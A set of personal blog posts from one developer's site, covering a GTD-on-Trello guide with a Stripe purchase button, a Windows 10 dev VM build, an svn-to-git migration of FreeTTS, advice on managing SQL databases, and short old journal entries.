Install the Trello app and use the native share buttons to share pictures, web pages etc to your GTD inbox. Use this to take photos of paper documents and physical things you need to deal with and send the picture straight to your GTD inbox on Trello.

#### Verbally Received Tasks
For when someone just says to you "oh, can you do this for me?" and you don't want to be that person that lets them down by forgetting.
If you think you are "the forgetful type" (you aren't, that's just a negative self-label compounded by habits), then you can fix it forever by just being more organised, no-one will ever know it was GTD, they just think you remembered for them.
Open up Trello on your phone or laptop and add a card. Or if it's easier write an email to your GTD board!
#### Using Alexa/Siri etc
For advanced magic teach your Siri/Alexa/Google to email to GTD by mere voice command
> Hey google, email gtd ...
Or maybe set up a custom action. (If anyone's done this send me some details and I'll expand out this section. PRs welcome!)
### GTDing
#### Inbox Processing (Daily)
Go through inbox cards and triage them as follows:
* Unactionable or not important?
* Archive the card
* or move to reference
* or move to someday.
* Less than 2 mins?
* Do now.
* For someone else?
* Move to "waiting"
* Need to just mull it over a bit?
* Move to "incubate"
* For future time/date?
* Add to [google calendar](https://calendar.google.com/) as event or timed reminder and move to "scheduled".
* More than single step to complete? (Even two really small steps counts)
* Move to "projects"
* and add a checklist.
* For some multi-step things I keep it as a single card, put it in actions but put the next step in the title (e.g. "something to do - call bob"), and when I've done that step I update the title to the next step. It's a bit less overhead than juggling multiple cards, but it's a judgement call whether it's worth a project card. I like project cards for things that are going to drag on over months.
* Finally if none of the above then:
* move to "action items"
* and edit the card to make sure it's doable in one go (add links, forms, phone numbers etc).
I've learned to do more of this in the Trello app when I have five idle minutes during the day so that when I sit down at the laptop I don't use all the time just getting GTD straight.
I add some Trello labels to the cards so that I can tell whether a card is something I can pick up in any particular situation (do I need the laptop? good phone signal? good internet? do I need to be somewhere in particular?) The situational ones are all black with an `@` prefix, e.g. `@home` or `@good-internet`.
#### Projects (Weekly)
Go through each project
* Do I still need this project (move to someday, or just archive the card if not).
* Create next action card - use the "convert checklist item to card" feature of Trello.
#### Waiting (Weekly)
* Set due dates on the cards so that they'll get highlighted if they are due chasing next time you review.
* Chase up if no action from others and past the due date (maybe fire off an email or WhatsApp).
* Archive if dealt with, or move back to inbox if it's thrown up other issues.
#### Rules - Thou Shall Not Scroll
I.e. things that I've learned knock me off track when trying to do a "GTD" session.
* DO NOT READ the articles - send them to [Pocket](https://getpocket.com/).
* DO NOT READ the newsletters - leave them as unread in mail inbox.
* NO twitter/facebook/linkedin FEED reading (posting is okay).
### Dealing With Action Items
Once your GTD board is triaged your inbox should be empty and your action items should be prioritized and full of things that you can "just do" without getting blocked. Start at the top and work down as if your boss told you to get on with it.
This is where the magic happens!
### What to do when "Action Items" is too long or not getting done
I found that after a while Action items gets overwhelming. Cards end up stuck in there forever, never quite getting to done.
To deal with this, use the "move all cards in list feature of Trello".
You have two choices here depending on the state of your list and how important thing things in it are:
* Move all cards back to Inbox and re-triage them.
* Move all the cards to "Someday" because they actually weren't that important.
Or you might pick a few to bump back to inbox then move everything else.
This gives you a complete reset, and eliminates the mental overwhelm that results from an unrealistic todo list.
You might initially think this is a failure of the GTD method, but actually without GTD you are just forgetting things that have been on your brain's todo list, and maybe some of them were actually important. With this approach you have the opportunity to decide what you want to punt to the eternal pot of "someday" with no angst that you are dropping important tasks.
If you have tasks that really are important and they are never getting done, then
* you're avoiding it and you need to move them to the top and just do them, a well formed action card is often not as bad when you actually tackle it,
* or you don't allocate sufficient time in your life for these tasks, and it's up to you if you want to adjust your schedule to get more done.
### Watch Out For
Spending all your time just arranging your GTD board and never doing any of the action items. Are you avoiding an unpleasant task? Are your tasks too big and need breaking down?
### When the lists get long
You have to make sure you're investing enough time on average for the piles not to build up and up.
When my list got to the several hundred range I needed to know for my own sanity whether I was winning or losing week by week, it's hard to remember whether the inbox was on 197 or 185 the week before. Being a bit of a systems person not afraid of a spreadsheet, I enabled the [firefox trello card counter addon](https://addons.mozilla.org/en-US/firefox/addon/firefox-trello-card-counter/), manually copied them into a spreadsheet, added a graph, and now I can see if I need to spend more or less time getting on top of it.


I've shared a [google sheets copy of the card count graph spreadsheet](https://docs.google.com/spreadsheets/d/e/2PACX-1vTJ--K37eyRik0kpBbwaGlH5p5nxfYliJDuRxkZmitntMBAnp4Cl0fW71drbvZxqQ6ApZB3LcL9XX8q/pubhtml) which you can use yourself.
## Learn more
### Podcast
Having run this system for a while, it grew to a daunting few-hundred cards in inbox/actions. To figure out what I'm doing wrong I did some more research.
The [official GTD podcast](https://gettingthingsdone.com/category/podcast-2/) is gold, hearing from the creator and his consultants on how they really use it and help clients get unstuck was really helpful.
Key points I learned:
1. Projects are not what you'd normally think of, they're just anything bigger than one action. *Anything*. (You can add another layer for big projects if that's your world).
2. The weekly review isn't just shuffling your todo pile. It's stepping back and considering the big picture, setting strategic direction, and just having time to reflect.
3. If tasks are getting stuck, or you are avoiding them it's probably because you haven't taken the time to step back and think clearly about whether it's something you actually want to do (someday/incubate/delete), and if you do then thinking about what the one next step might be (e.g. "google xx to learn more" about it).
### Articles
In no particular order, and of varying usefulness:
* <https://facilethings.com/blog/en/starting-gtd-when-you-are-busy>
* <https://lifehacker.com/the-weekly-review-how-one-hour-can-save-you-a-week-s-w-5908816>
* <https://todoist.com/productivity-methods/getting-things-done>
* <https://blog.doist.com/gtd-tips/>
* <https://www.reddit.com/r/gtd/comments/8bv3as/how_do_i_keep_my_gtd_inbox_from_overflowing_to/>
* <https://plan.io/blog/getting-things-done/>
* <https://www.taskade.com/blog/outliner-note-taking/>
* <https://www.taskade.com/blog/getting-things-done-gtd/>
* <https://www.taskade.com/blog/hierarchical-note-taking/>
## Get started with a template GTD+Trello board
You can easily create your own GTD Trello board from this template I've created for you.
The template contains:
* Preconfigured columns,
* Labels,
* Some example cards,
* A full instruction list in the inbox for daily processing,
* A butler action button for moving to "someday".
I reckon using this ready-made template will save you at least an half-an-hour of your time just fiddling with Trello to get going. It'd also be a nice way of saying thanks if you found this article useful.

<!-- Load Stripe.js on your website. -->
<script src="https://js.stripe.com/v3"></script>
<p style="text-align: center;margin: 2em;">
Go to stripe to pay securely:
<br/>
<button
style="background-color:#6772E5;color:#FFF;padding:8px 12px;border:0;border-radius:4px;font-size:1em"
id="checkout-button-price_1HRjjxBOy2zUVRPdBXTMJ5tv"
role="link"
type="button"
>
Buy My GTD Template For £5
</button>
</p>
If you are in any way dissatisfied then let me know within 30 days and I will refund you, no questions asked.
### Business details
Payment will go to Charm Consulting Ltd., which is my wholly owned contracting company.
Registered address: Unit 4, Vista Place, Coy Pond Business Park, Ingworth Road, Poole, BH12 1JY
<div id="error-message"></div>
<script>
(function() {
var stripe = Stripe('pk_live_yNiRZTjor0ntOGLd5UFPeqW3');
var checkoutButton = document.getElementById('checkout-button-price_1HRjjxBOy2zUVRPdBXTMJ5tv');
checkoutButton.addEventListener('click', function () {
// When the customer clicks on the button, redirect
// them to Checkout.
stripe.redirectToCheckout({
lineItems: [{price: 'price_1HRjjxBOy2zUVRPdBXTMJ5tv', quantity: 1}],
mode: 'payment',
// Do not rely on the redirect to the successUrl for fulfilling
// purchases, customers may not always reach the success_url after
// a successful payment.
// Instead use one of the strategies described in
// https://stripe.com/docs/payments/checkout/fulfillment
successUrl: 'https://timwise.co.uk/pay/success-gtd/',
cancelUrl: 'https://timwise.co.uk/pay/cancelled/',
})
.then(function (result) {
if (result.error) {
// If `redirectToCheckout` fails due to a browser or network
// error, display the localized error message to your customer.
var displayError = document.getElementById('error-message');
displayError.textContent = result.error.message;
}
});
});
})();
</script>
## Beyond GTD
I still struggle with what to do *today* even with GTD in place. I've found the (paid) [Sunsama](https://sunsama.com/) app to be a game changer, especially as I transition to full business owner from sole contractor. You could do it without, but having an app that continuously reminds you what you planned to do today & this week makes sticking to priorities so much easier.

<file_sep>---
title: "roxio"
date: 2004-09-02
slashdot_url: https://slashdot.org/journal/82474/roxio
---
<p>I was just about to have a rant at roxio for forcing me to register to obtain updates when I discovered they've <a href="http://hardware.mcse.ms/message57667.html">sold out</a> and are likely to be up shit creek anyway. Good luck to them, I hope they pay the artists a fair percentage.</p>
<file_sep>---
layout: post
title: Building a Windows 10 Development VM from scratch
date: 2018-04-01 20:10:54.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2018/04/01/building-a-windows-10-development-vm-from-scratch/"
---
Rebuilding windows dev VM from scratch, reminds me why people put up an old build for so long. What a painful process!
I did wonder if I could get away with mssql on linux, and tried the [mssql docker image, which hosed my linux kernel](https://github.com/Microsoft/mssql-docker/issues/284). That's too many yaks for one morning.
## Windows Install
Download from <https://www.microsoft.com/en-us/software-download/windows10ISO>
* Windows 10 Fall Creators Update
* English
* 64-bit
Start a new VM with the iso. Run the install. Install hangs on windows logo. Hard reset, try again several times. Eventually it works. Even managed to crash my host entirely.
Shut down the VM with clean windows install.
Take a backup
# backing up a vm
```
cd VirtualBox\ VMs/
base=.
src=win10-2018
ls -lh $src
du -sh $src
df -h .
tar -cpC $base $src -P | pv -s $(du -sb $base/$src | awk '{print $1}') | lz4 >> $src.tar.lz4
# 8.79GiB 0:00:43 [ 205MiB/s] [=====================================================================> ] 99%
```
[Gist for backing up with lz4](https://gist.github.com/timabell/68d112d66623d9a4a3643c86a93debee#file-backup-sh-L21)
## Updates! Updates! Updates!
(as Ballmer once said?)
* poke **windows updates** until it finally decides there's no more
* reboot
* poke windows updates until it finally decides there's no more
* reboot
* poke windows updates until it finally decides there's no more
* reboot
* Install **virtualbox guest additions 5.1.34**
* reboot
* shutdown
* backup again
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/38944561440/"
target="_blank"><img
src="https://live.staticflickr.com/4798/38944561440_829d76ac80.jpg"
style="max-height: 375px" alt="Photo of a lit pool at night"></a>
</div>
## The Snapshot Trials
[VirtualBox has a neat snapshot feature](https://www.howtogeek.com/150258/how-to-save-time-by-using-snapshots-in-virtualbox/), so you can try out a whole tree of attempts at installs then squash them into the final image or roll them back.
Take a snapshot as a starting point for trying out the eternally broken boxstarter script.
## Boxstarter
[Boxstarter script, mostly working in win 10](https://gist.github.com/timabell/608fb680bfc920f372ac) now, but so much more to do on top that, including [windows branch of dotfiles](https://github.com/timabell/dotmatrix/tree/windows) (always needs work). Read the script to see what it configures and installs.
You'll want to watch this vid at at least 2x playback speed:
<https://youtu.be/Hiz9_i67B3o>
## annoyances / setup - grab reg keys
* disable screensaver
* hide task manager when minimized
* `HKCU\Software\Microsoft\Windows\CurrentVersion\TaskManager\Preferences` - binary. sigh.settings > m
* multitasking > snap (these have been rolled in to my boxstarter, but not tested there).
* `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SnapAssist` - 0
`HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\JointResize` - 0
* all sounds off - generates 100s of reg keys, one for each event
* mute
## get ready for dev
* vs sign-in
* extension updates
* ssdt - external download popup, installs sql server 2016 localdb, takes forever, requires reboot
* azure - leave for now, also external
* jetbrains toolbox (sign in)
* resharper
* datagrip
## VS Extensions
`cinst editorconfig.vs vsvim ihateregions -y` - bit-rotten, didn't work - I should contact the [VsVim package maintainer](https://chocolatey.org/packages/vsvim). Oh never mind that would be me then.
Extensions to install manually:
* <https://marketplace.visualstudio.com/items?itemName=JaredParMSFT.VsVim>
* <https://marketplace.visualstudio.com/items?itemName=ZoltanKlinger.RelativeLineNumbers>
* <https://marketplace.visualstudio.com/items?itemName=MadsKristensen.MarkdownEditor>
* <https://marketplace.visualstudio.com/items?itemName=VisualStudioProductTeam.VisualStudio2015ColorThemeEditor> - to get solarized colours
Something to look in to <https://chocolatey.org/packages/batch-install-vsix>
## Git setup
GitExtensions defaults to the program files putty, but the chocolatey one is newer and github deprecated the comms the old one uses.
* <https://github.com/desktop/desktop/issues/4105>
* <https://blog.github.com/2018-02-23-weak-cryptographic-standards-removed/>
Change all the putty paths in git extensions to start with `C:\ProgramData\chocolatey\bin\...`

<https://git-extensions-documentation.readthedocs.io/en/latest/settings.html>
> Settings that are specific to Git Extensions and apply globally will be stored in a file called `GitExtensions.settings` either in the user’s application data path or with the program. The location is dependant on the IsPortable setting in the `GitExtensions.exe.config` file that is with the program.
i.e .`C:\Users\tim\AppData\Roaming\GitExtensions\GitExtensions`
### Key Setup
* Map a read-write folder to outside the VM to keep the putty keys in (this avoids regenerating the key if the VM is regenerated / rolled back, and also means keys aren't copied around with the VM image which makes them a bit easier to keep track of
* git extensions > tools > putty > generate
* set passphrase
* save pub & private keys to shared folder
* grab the public key from the generator, paste into github & bitbucket website account ssh configs
* git extensions > tools > putty > start agent > add keys
### DotMatrix
Start git bash from git extensions, not the start menu (to get ssh set up right).
```
cd /c/repo && mkdir tim && cd tim
git clone git@github.com:timabell/dotmatrix.git
cd dotmatrix/
git checkout windows
bin/install
git st
```
## VS Settings

VS > Options > Environment > Import/export > set the path to the dotmatrix copy
## resharper settings

VS > Resharper > manage options > right-click the gap > add layer > open settings file > select the one from the dotmatrix
## More settings
* VsVim settings
* git config
* email/name
## More installs
redgate tools
* dev bundle:
* sql prompt - for VS too
* compare
* data compare
* doc
* toolbelt bundle
* readyroll
## firefox
* sign-in
* ghostery settings - disable annoying purple dot
<file_sep>---
title: "I know where my towel is."
date: 2004-09-13
slashdot_url: https://slashdot.org/journal/83600/i-know-where-my-towel-is
---
<p>Ok, this is the best thing ever.<br>Anyone who reads this <b>must</b> listen to the hitch hikers guide to the galaxy. I remember this from when it was first broadcast, and I don't think there's anything I could say that does it justice.<br><a href="http://www.bbc.co.uk/radio4/hitchhikers/">http://www.bbc.co.uk/radio4/hitchhikers/</a><br>Episode 1- Tuesday 21 September 2004 6.30pm, repeated Thursday 23 September 11.00pm<br>Don't miss it.</p>
<file_sep>---
layout: post
title: Subversion to git - the pain retold
date: '2012-12-05T00:33:00.000Z'
author: <NAME>
tags:
modified_time: '2012-12-05T00:33:51.154Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-8381628268559719103
blogger_orig_url: https://timwise.blogspot.com/2012/12/subversion-to-git-pain-retold.html
---
I've spent a week reminding myself why svn sucks.
I've been using the [freetts](http://freetts.sourceforge.net/) library for
speech synth in the [communication
book](http://communication-book.wikispaces.com/) program I've been working on,
and have tripped over a bug in freetts running under openJdk. The freetts
source code lives in a svn repository on sourceforge. The first step in
troubleshooting is to build the library from source. In order to track any
local experimentation / fixes I need to have some kind of local source control,
and svn sucks too much to provide this. The obvious next step is to pull the
sources down with git-svn (or svn2git as github recommends).
After a couple of aborted attempts I was reminded how the loosely defined
structure of a svn repository and the over-generalization of tags & branches
allows for a complete mess, which then is a pain to import cleanly.
> "And they want to make snapshots of smaller subdirectories of the filesystem.
> After all, it's not so easy to remember that release 1.0 of a piece of
> software is a particular subdirectory of revision 4822."
>
> ~ [http://svnbook.red-bean.com/en/1.7/svn.branchmerge.tags.html](http://svnbook.red-bean.com/en/1.7/svn.branchmerge.tags.html)
**Argh!** Terrible "feature", if you're using this feature then _you're doing
source control wrong_!
I could just grab a tarball and start from there, however there is new code
upstream since their last release (v1.2.2), and that means testing two
branches, and possibly investigating diffs. In addition if I'm going to make
the effort to import the history, I ought to do it well enough first time that
others can build on it. It's much harder to correct a bad scm import once work
is continued, especially in the distributed world of open source.
And so, for my sins, I set about importing the history, and hacking away at it
with the excellent tools git provides to turn it into something that actually
linked together correctly and didn't make me feel ill by including CVSROOT all
over the place (yes, it's not the first migration this project's been through).
On the plus side, it is fantastic that the open source license gives a user of
a library such as myself the right to go ahead and do something like this and
to share the improvement with the world, regardless of whether it's something
the original creators / maintainers would have done.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/8160450028/"><img
src="https://live.staticflickr.com/7271/8160450028_af1097a2f7.jpg"
alt="Photo of lake, trees and ducks at sunset"></a>
</div>
The layout of the FreeTTS svn repo is not consistent in directory structure,
which means the svn import tools don't behave quite as one might expect. This
is the inevitable downside to subversions poor choice of architecture around
"everything's just a directory structure". (Bitter? Me? Never!)
Here's a taster of how inconsistent the layout is and what a challenge is ahead
tidying it up:
```
tim@atom:~/repo/freetts.svn$ ls */*
branches/release:
FreeTTS
tags/freetts:
FreeTTS
tags/pre-rel1-1:
FreeTTS
tags/rel_1_0_5:
CVSROOT FreeTTS
tags/rel1_1_0:
FreeTTS
tags/rel1_1_2:
FreeTTS
tags/rel1_2_0:
CVSROOT FreeTTS
tags/rel1_2_1:
FreeTTS
tags/rel1_2_2:
acknowledgments.txt build.xml demo.xml index.html license.terms overview.html RELEASE_NOTES speech.properties tests
ANNOUNCE.txt demo docs lib mbrola README.txt rtp src tools
tags/rel_1_2_beta:
FreeTTS
tags/rel1_2beta2:
CVSROOT FreeTTS
tags/start:
FreeTTS
tags/sun:
FreeTTS
trunk/CVSROOT:
checkoutlist commitinfo config cvsignore cvswrappers editinfo loginfo modules notify rcsinfo syncmail taginfo verifymsg
trunk/FreeTTS:
acknowledgments.txt build.xml demo.xml index.html license.terms overview.html RELEASE_NOTES speech.properties tools
ANNOUNCE.txt demo docs lib mbrola README.txt rtp src unittests</span>
```
It took all my git-fu powers to sort out this mess. Below is a time shortened
sequence of how it was done, just in case I have the misfortune to need to do
it again. I ended up abandoning all the ancient tags as they were going to be
more effort than I liked to fix, and they could be added retrospectively if
anyone really cared. It took me many attempts to get to the below, and this is
what I've reconstructed from my fragmented history, hopefully it will provide
enough clues should you wish to do similar.
FreeTTS project urls:
* Project front page [http://freetts.sourceforge.net/](http://freetts.sourceforge.net/)
* project site [http://sourceforge.net/projects/freetts/](http://sourceforge.net/projects/freetts/)
* repo browser [http://freetts.svn.sourceforge.net/viewvc/freetts/](http://freetts.svn.sourceforge.net/viewvc/freetts/)
* svn http access [https://freetts.svn.sourceforge.net/svnroot/freetts/](https://freetts.svn.sourceforge.net/svnroot/freetts/)
At time of writing the current svn revision is 582.
The latest packaged version for ubuntu:
```
**apt-cache show freetts**Package: freetts
Priority: optional
Section: universe/java
Installed-Size: 13532
Maintainer: Ubuntu Developers <[<EMAIL>>](http://www.blogger.com/<EMAIL>%3E)Original-Maintainer: <NAME> <[<EMAIL>>](http://www.blogger.com/<EMAIL>%3E)Architecture: all
**Version: 1.2.2-3**Depends: default-jre | java2-runtime
Filename: pool/universe/f/freetts/freetts_1.2.2-3_all.deb
Size: 9456904
MD5sum: 183bed09b1b8e2d8642f46b7538273f4
SHA1: 8df47df82124704b890f446a1bc958d33fd273d3
SHA256: 8920440eaa58c087cb268e8e2a64d44ac873fb44d49b34f180f587f9c69421a7
Description-en: speech synthesis system
FreeTTS is a speech synthesis system written entirely in the Java(TM)
programming language. It is based upon Flite, a small run-time speech
synthesis engine developed at Carnegie Mellon University. Flite in turn
is derived from the Festival Speech Synthesis System from the University
of Edinburgh and the FestVox project from Carnegie Mellon University.
Homepage: [http://freetts.sourceforge.net](http://freetts.sourceforge.net/)Description-md5: a346fe6dcc2c0164ec6b7c3891945e56
Bugs: [https://bugs.launchpad.net/ubuntu/+filebug](https://bugs.launchpad.net/ubuntu/+filebug)Origin: Ubuntu
```
So here's the import more or less as it happened:
```
mkdir freetts.svn.git; cd freetts.svn.git
svn2git --verbose (https://freetts.svn.sourceforge.net/svnroot/freetts/
git gc
```
```
cat .git/config
[core]
repositoryformatversion = 0
filemode = true
bare = false
logallrefupdates = true
[svn-remote "svn"]
noMetadata = 1
url = [https://freetts.svn.sourceforge.net/svnroot/freetts](https://freetts.svn.sourceforge.net/svnroot/freetts) fetch = trunk:refs/remotes/svn/trunk
branches = branches/*:refs/remotes/svn/*
tags = tags/*:refs/remotes/svn/tags/*
[branch "release"]
remote = .
merge = refs/remotes/svn/release
```
get a copy without the svn references (which stop us seeing whether the rewritten history is free of old cruft)
```
cd ..
git clone freetts.svn.git/ freetts.git
cd freetts.git/
gitk --all &
**# The following is done while keeping an eye on and refreshing (ctrl+f5) gitk to see the effects:**
# Filter out the cvs rubbish so that git can match up commits that do have it with commits that don't
git filter-branch --tree-filter 'rm -rf CVSROOT' --prune-empty -- --all
# Remove the unnecessary top level folder (which inconsistently existed)
git filter-branch --prune-empty --subdirectory-filter FreeTTS/ -- --all
# Remove the backup refs filter-branch creates
rm -rf .git/refs/original/
```
delete all the crappy svn "tags", just tag the latest
```
git tag -d `git tag`
Deleted tag 'freetts' (was 8d953b7)
Deleted tag 'pre-rel1-1' (was d1c597f)
Deleted tag 'rel1_1_0' (was 625abdd)
Deleted tag 'rel1_1_2' (was b51fb71)
Deleted tag 'rel1_2_0' (was 7a4fc18)
Deleted tag 'rel1_2_1' (was a126a4a)
Deleted tag 'rel1_2_2' (was b3a0dcf)
Deleted tag 'rel1_2_2@557' (was bf94dbe)
Deleted tag 'rel1_2beta2' (was c0d90e9)
Deleted tag 'rel_1_0_5' (was e95aff8)
Deleted tag 'rel_1_2_beta' (was 1723b2d)
Deleted tag 'start' (was c020efe)
Deleted tag 'sun' (was cfadbc8)
```
correct commit found manually:
```
git tag v1.2.2 ae49425
```
and finally, push to github
```
git remote add origin .... (my repo details)
git push --mirror
```
You can find my repo at [https://github.com/timabell/FreeTTS](https://github.com/timabell/FreeTTS)
and the intermediate copy here: [https://github.com/timabell/FreeTTS-svn-mirror](https://github.com/timabell/FreeTTS-svn-mirror)
_All done_
`^_^`
Here's the reason I didn't bother with tags in the end: I couldn't rewrite the
tags as they had no author:
```
git filter-branch --tree-filter 'rm -rf CVSROOT' --prune-empty --tag-name-filter cat -- --tags
Cannot create a new backup.
A previous backup already exists in refs/original/
Force overwriting the backup with -f
tim@atom:~/repo/freetts.git$ rm -rf .git/refs/original/
tim@atom:~/repo/freetts.git$ git filter-branch --tree-filter 'rm -rf CVSROOT' --prune-empty --tag-name-filter cat -- --tags
Rewrite 8611e271692fc33e6160a2a217b9b3060dfbcd1d (1044/1044)
Ref 'refs/tags/freetts' was rewritten
WARNING: Ref 'refs/tags/pre-rel1-1' is unchanged
WARNING: Ref 'refs/tags/rel1_1_0' is unchanged
Ref 'refs/tags/rel1_1_2' was rewritten
Ref 'refs/tags/rel1_2_0' was rewritten
Ref 'refs/tags/rel1_2_1' was rewritten
Ref 'refs/tags/rel1_2_2' was rewritten
Ref 'refs/tags/rel1_2_2@557' was rewritten
Ref 'refs/tags/rel1_2beta2' was rewritten
Ref 'refs/tags/rel_1_0_5' was rewritten
Ref 'refs/tags/rel_1_2_beta' was rewritten
Ref 'refs/tags/start' was rewritten
Ref 'refs/tags/sun' was rewritten
freetts -> freetts (b3a4bbf8768ade6275c91ce0e76d933e30b3ddbf -> 48e84e3560e765db3b33479e2e9a76fe2ccf3550)
**error: char79: malformed tagger field
fatal: invalid tag signature file
Could not create new tag object for freetts**
git show rel_1_2_beta | head
tag rel_1_2_beta
**Tagger: (no author) <(no author)@4<PASSWORD>b-1a4a-0410-81c8-f0a525965860>**Date: Mon Dec 22 14:46:05 2003 +0000
This commit was manufactured by cvs2svn to create tag '\''rel_1_2_beta'\''.
commit 57ed00e981585aad590c9521d7c3a0bccf6284fa
Author: (no author) <(no author)@<PASSWORD>>
Date: Mon Dec 22 14:46:05 2003 +0000
```
------
My advice if you are importing svn for a commercial project: Don't! Just export, and import into your new source control tool. Leave the svn repo read only for a while just in case you need that history, and after a year of never looking back, archive it off.
<file_sep>---
layout: post
title: Developers, Love Your SQL Database
date: 2018-03-12 19:30:15.000000000 +00:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags: []
meta:
_wpcom_is_markdown: '1'
_rest_api_published: '1'
_rest_api_client_id: "-1"
_publicize_job_id: '15656264083'
timeline_notification: '1520883016'
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2018/03/12/developers-love-your-sql-database/"
---
Developers, don't be afraid of your SQL database, don't try and ignore it, try and make it the best it can be just like you do for your code.
## What's wrong today
I've noticed that a lot of projects that have SQL databases don't apply the high standards that they have for their codebase (refactoring, clean code, documentation, etc.) to the SQL part of their projects.
Dealing with relational databases is harder than code:
* The tooling that I see teams using to manage their relational databases is crap.
* Having to handle live data makes refactoring harder (but not impossible).
* SQL is a language from the stone-age of software.
But that's no excuse for not doing the best you can for the problem at hand.
## There are answers to these problems
Some of the answer is just accepting that it's harder and learning to be effective. For example I find [VsVim](https://marketplace.visualstudio.com/items?itemName=JaredParMSFT.VsVim) and [SQL Prompt](https://www.red-gate.com/products/sql-development/sql-prompt/) to be great for editing SQL.
[Redgate](https://www.red-gate.com/) have a great suite of tools for managing the full lifecycle of a database. Use them. I particularly like the way [ReadyRoll](https://www.red-gate.com/products/sql-development/readyroll/) handles migrations. RedGate tooling has excellent [integrations with Octopus deploy](https://octopus.com/blog/database-deployments-with-octopus-and-redgate-sql-release).
So if you're in the situation I've seen with a database you virtually can't change and nothing but a visual studio database project in place that may or may not be in place with production, then try the following:
1. Throw away the database project.
2. Set up ReadyRoll in your visual studio project.
3. Grab your production schema, and use that as a base in your ReadyRoll migrations. (It has a neat feature for a first "migration" that will only be run on a new database build, so it can build you a dev database from scratch, but it won't attempt to recreate production).
4. Configure ready-roll to use branch folders.
5. Start creating migrations in feature branches.
6. Set up CI / test / QA / pre-prod environments (or whatever you call them in your team) to drop and rebuild the database with every build. You can make this faster by using SQL Server snapshots.
7. Each environment then runs the database migrations that match the version of the codebase that was released to that environment.
8. Push changes up through the environments until those migration scripts have been run so many times you are no longer afraid to run them.
Now you can refactor your database with confidence just like you can with the code, and it can stop being something you pretend isn't there and start being something you are proud to show off.
There are many potential complications, such as re-indexing tables with lots of data in production, but these are not things that an intelligent well-functioning DevOps team can't handle well once the basic process is in place.
## Further Reading
* [https://gist.github.com/timabell/6fbd85431925b5724d2f](https://gist.github.com/timabell/6fbd85431925b5724d2f) - source control your schema documentation (ms_description attributes)
* [https://dba.stackexchange.com/questions/515/how-do-you-document-your-databases](https://dba.stackexchange.com/q/515/33693)
* * *
If you like this, you might appreciate the tool I'm working on to shed further light on the dark corners of your SQL database, check it out at [http://schemaexplorer.io/](http://schemaexplorer.io/?utm_source=blog.timwise&utm_medium=web&utm_campaign=love-db) and be sure to sign up to the waiting list.
<file_sep>---
title: "eBay / iRiver"
date: 2005-06-23
slashdot_url: https://slashdot.org/journal/110112/ebay--iriver
---
<p>Gosh I really was annoyed on sunday!</p>
<p>Having said all that, buy my stuff on eBay (again)!<br>I'll figure out an alternative another day, but it's gonna be tricky when eBay have market share and a fat advertising budget.<br>Never trust a company with a large advertising budget, they tend to discover advertising budget has a better ROI than investing in the product, motivating staff, providing customer support etc etc.</p>
<p>In other news, the new iRiver H10 looks nice but appears to be missing all of the advatages of the older H300. Damn. Thought it was about to kick iPod's shiny backside.</p>
<p><a href="http://search.ebay.co.uk/_W0QQfgtpZ1QQfrppZ25QQsassZtimQ5fabell">http://search.ebay.co.uk/_W0QQfgtpZ1QQfrppZ25QQsassZtimQ5fabell</a><br><a href="http://www.iriver.com/">http://www.iriver.com/</a></p>
<file_sep>---
title: "Swimming"
date: 2004-01-15
slashdot_url: https://slashdot.org/journal/58405/swimming
---
<p>20 lengths today. In 45 mins. Did quite a lot in front crawl today so am quite pleased, then I used one of those float things so I could just use my legs. Apparently my kicking for front crawl adds nothing to my forwards movement but still wears me out, that might explain why I have such difficulty with front crawl. Think I'll need to work on that one. My legs seem quite good at breast stroke style swimming as I can quite easily do a length that way. I did do a couple of really fast lengths (by my standards), one in front crawl, the other in breast stroke. Oh, and just because I like being a bit sad sometimes, I counted some of the lengths in binary.<nobr> </nobr>:D</p>
<file_sep>---
layout: page
title: Payment cancelled, oh no!
---
I'm afraid I have no idea what happened, but if you have any problems get in touch <<EMAIL>>
<file_sep>---
title: "So what _is_ the \"internet\"?"
date: 2004-08-22
slashdot_url: https://slashdot.org/journal/81179/so-what-is-the-internet
---
<p>Maybe it's a <a href="http://www.bsd-unix.net/seitz/funny/RvB_NYC2.mov">movie</a>? [edit: link busted.<nobr> </nobr>:( ]<br>Thank you <a href="http://b3ta.com/newsletter/issue148/">b3ta</a></p>
<file_sep>---
title: "Another rung on the ladder"
date: 2004-07-05
slashdot_url: https://slashdot.org/journal/76532/another-rung-on-the-ladder
---
<p>Today I passed microsoft exam <a href="http://www.microsoft.com/learning/exams/70-270.asp">70-270</a>.</p>
<p>So you can call me<br><NAME> BSc MCP<br>Woo!</p>
<file_sep>---
title: "life update"
date: 2004-09-01
slashdot_url: https://slashdot.org/journal/82368/life-update
---
<p>it's late so I'll keep it short.<br>I went to greenbelt this weekend, which was fun. Good music, great music, some terrible music. A bearable dose of religion, and quite a nice element of generic spirituality. Plenty of rain outside the tent but I didn't get very wet except when I flew my kite.</p>
<p>Dropped in to london town last night to see some old friends and had a great evening. Don't think there's anything I can relay here though!</p>
<p>urgh. bed.</p>
<p>did I mention I'm now running an apache webserver on Mandrake Linux? I did? Oh well, never mind then.</p>
<file_sep>---
layout: post
title: Configuration confusion in visual studio
date: '2012-07-10T14:43:00.001Z'
author: <NAME>
categories: [gotcha, visual studio]
modified_time: '2012-07-10T14:43:30.568Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6546456780454569539
blogger_orig_url: https://timwise.blogspot.com/2012/07/configuration-confusion-in-visual.html
---
Here's a gotcha that got me.
It is not immediately obvious, but visual studio stores in it's sln file a set
of project configuration selections for every combination of solution
configuration and solution platform.

The gotcha is that by default Visual Studio (all versions 2008-2012 as far as I
know) only show one half of that combination in the standard toolbar, so you
can get in a situation where one of your developers is building something
completely different to everyone else as somehow the platform has silently been
changed.
I recommend you add Platform to your toolbar so that you can _always_ see what
you are about to build.


And if possible, remove any unused platform configurations from your solution
entirely.
<file_sep>---
title: "File manager of fun"
date: 2004-04-05
slashdot_url: https://slashdot.org/journal/67358/file-manager-of-fun
---
